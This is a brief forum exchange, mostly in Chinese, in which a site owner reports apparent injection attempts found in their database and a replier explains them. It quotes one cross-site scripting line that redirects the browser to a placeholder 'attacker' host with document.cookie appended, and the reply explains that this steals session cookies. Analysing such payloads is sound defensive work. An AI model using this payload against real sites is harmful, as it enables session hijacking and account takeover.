我刚刚在我的数据库中发现了一些看起来像它们可能是注入企图的东西。我想知道他们是否对我的数据库做了什么恶意的事情。谢谢。
Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results
Window.location='http:attacker?cookie='+document.cookie.
@jessica,对我来说,看起来脚本试图将用户重定向到攻击者的网站以及cookie。这个可以用来尝试窃取用户的会话cookie,并以该用户的身份登录。
如果受影响的用户是管理员或具有更高权限的用户,则攻击者将具有与该用户相同的权限。
我很好奇,如果你能在你的数据库(网站文件)的某个地方找到实际的脚本,或者如果有人只是在你的网站上执行搜索,并得到一个错误。
是否在日志表中发现了这个?